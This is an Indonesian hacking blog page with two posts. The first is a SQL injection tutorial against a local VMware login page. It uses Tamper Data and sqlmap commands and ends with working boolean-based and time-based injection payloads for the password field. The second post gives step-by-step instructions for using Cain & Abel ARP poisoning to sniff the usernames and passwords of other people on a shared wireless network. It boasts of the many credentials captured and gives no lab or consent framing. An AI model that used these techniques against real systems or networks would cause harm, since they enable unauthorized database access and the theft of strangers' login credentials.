Kamis, 28 Februari 2013


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!

Tutorial SQL Injection Untuk Newbie


Tutorial SQL Injection Untuk Newbie  - Kali ini saya akanl membahas tentangTutorial SQL Injection Untuk Newbie. saya akan memberikan sedikit pelajaran mengenai SQL Injection. Pada tutorial sql injection kali ini, saya tidak menggunakan live target, karena saya rasa itu bersifat merusak. Sehingga saya coba metode ini di localhost dengan bantuan VMware.

Bahan - Bahan Yang Akan Kita Gunakan Pada Tutorial SQL Injection  :
-Mozilla Firefox
-Tamper Data
-SQLmap

1. Menguji vulnerability
Kali ini, vmware saya telah berjalan dan memiliki ip address 172.16.33.131. Saya buka firefox, kemudian saya masukan IP address 172.16.33.131 pada address bar.
SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, - r14nulr00t.blogspot.com
Setelah Itu Test Login Dengan :
Username : admin Password : admin

Kemudian Hasil-nya :
SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, - 

r14nulr00t.blogspot.com

Kita berada di halaman checklogin.php . Disini tidak ada parameter untuk diuji. Mungkin saya bisa menguji data yang dikirim ke server. Saya kembali lagi ke halaman login. Dengan Username Dan Password :
Username : admin Password : '
Dan Hasilnya :
SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, - 

r14nulr00t.blogspot.com

Kelihatannya website ini Vulnerable . Namun tetap tidak ada parameter. Sehingga dapat disimpulkan bahwa vulnerability bukan terletak pada parameter, melainkan DATA. Untuk mengecek data yang dikirim ke server, saya gunakan Tamper Data .

2. Tamper Data In Action
Jika anda belum memiliki tamper data, anda bisa Mendownloadnya Lewat link ini >>. Namun add-on ini hanya dapat digunakan di Mozilla Firefox. Dan tidak dapat digunakan di Browser lain.

Setelah menginstall, tamper data dapat diaktifkan di Tools --> Tamper Data
SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, - 

r14nulr00t.blogspot.com

Kembali ke halaman login Dengan Username & Password :
Username : admin Password : 123

Maka tamper data akan mengambil setiap data yang terjadi selama proses transfer data dari client ke server, maupun sebaliknya.
SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, - 

r14nulr00t.blogspot.com

OK. Saya temukan POSTDATA=myusername=admin&mypassword=123&Submit=Login. Ternyata ada 3 data di sini. yaitu myusername, mypassword, dan Submit. Dan kita telah mengetahui bahwa data password vulnerable. Selanjutnya kita akan gunakan SQLmap untuk menguji database menggunakan informasi yang telah kita dapatkan.

3. SQLmap in Attack
CODE :
red-dragon [~] >> cd /pentest/database/sqlmap/                                                           red-dragon [/pentest/database/sqlmap] >> python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&mypassword=123&Submit=Login" -p mypassword --flush-session

Keterangan :
-u = url [Pesan error muncul pada halaman checklogin.php]
--data = [Kali ini kita akan memberikan data pada server dengan cara tampering / menyuap]
-p = parameter [Parameter yang vulnerable adalah mypassword
--flush-session = Bagian ini tidak masalah jika tidak disertakan.

SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, - 

r14nulr00t.blogspot.com
Muncul pertanyaan :
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

Kemudian muncul lagi :
sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

dan berujung pada CRITICAL :
[CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. Please, consider usage of tampering scripts as your target might filter the queries. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details

SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, Backtrack, - 

r14nulr00t.blogspot.com


4. Over
Saya coba naikan level dan risk pada testing SQLmap menjadi 5.
CODE :
red-dragon [/pentest/database/sqlmap] >> python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&mypassword=123&Submit=Login" -p mypassword --level=5 --risk=5

SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, Backtrack, - 

r14nulr00t.blogspot.com
Kemudian muncul lagi:
sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

Dan muncul pesan yang membahagiakan:
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

Saya jawab "n", kemudian "enter".

Dan payload untuk website ini adalah:
CODE :
Place: POST Parameter: mypassword Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: POSTDATA=myusername=admin&mypassword=-3973' OR (5599=5599) AND 'eHOv'='eHOv&Submit=Login Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: POSTDATA=myusername=admin&mypassword=123' AND 2246=BENCHMARK(5000000,MD5(0x77544b50)) AND 'bGtM'='bGtM&Submit=Login

SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, Backtrack, - 

r14nulr00t.blogspot.com

Semoga Bermanfaat :D ,

Senin, 25 Februari 2013

0 Menyadap Data Komputer Orang Dengan Cain & Abel


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
Kali ini akan membahas bagaimana Cara Menyadap Data Komputer Orang Dengan Cain & Abel . Langsung Aja Prakteknya dibawah gk usah banyak ngomong ...

Sekedar Info >>
Cain & Abel  adalah sebuah program Recovery Password sekaligus Pengendus Jaringan dari Massimiliano Montoro yang bisa didownload pada http://www.oxid.it/. Jika anda belum mengetahui apa itu pengendus jaringan, mungkin kata network analyzer bisa membantu. Atau jika tidak, mungkin anda pernah mendengar sebuah tool bernama ethereal (Sekarang namanya wireshark-hiu kabel-)? Singkatnya, dua-duanya adalah Sniffer.

Cain & Abel mudah digunakan untuk pemula karena lebih enak dilihat untuk mata pemula :P. Lebih sedikit berwarna-warni jika dibandingkan dengan ethereal. Oke, cukup bicara tentang ethereal karena judul diatas berbicara mengenai Cain & Abel. Dua anak nabi Adam yang kali ini tidak saling membunuh tapi malah bekerjasama membantu anda :D.

Cain & Abel mempunyai banyak fungsi salah satunya yaitu merekam kegiatan orang lain yang berada dalam satu jaringan wireless dengan kita misalnya username dan password orang bisa kita dapatkan.

Bagaimana cara menggunakannya? Ikuti langkah-langkah berikut.
1. Download Cain & Able.
    DOWNLOAD DISINI
2. Buka Cain & Able dan instal seperti biasanya.
3. Setelah selesai diinstal maka program akan muncul seperti gambar berikut.


4. Klik start/stop sniffer.
5. Klik kanan dan pilih Scan MAC Addresess. lihat gambar.


6. Setelah itu pilih APR tepatnya di sebelah kanan Hosts.
7. Klik Add to list, iconnya tanda plus berwarna biru.

* Pilih target yang anda inginkan lalu klik OK.

8. Klik start/stop APR.


9. Klik Passwords. Dan anda dapat melihat password yang terrecord.

* Lihat banyak sekali username dan password yang kita dapatkan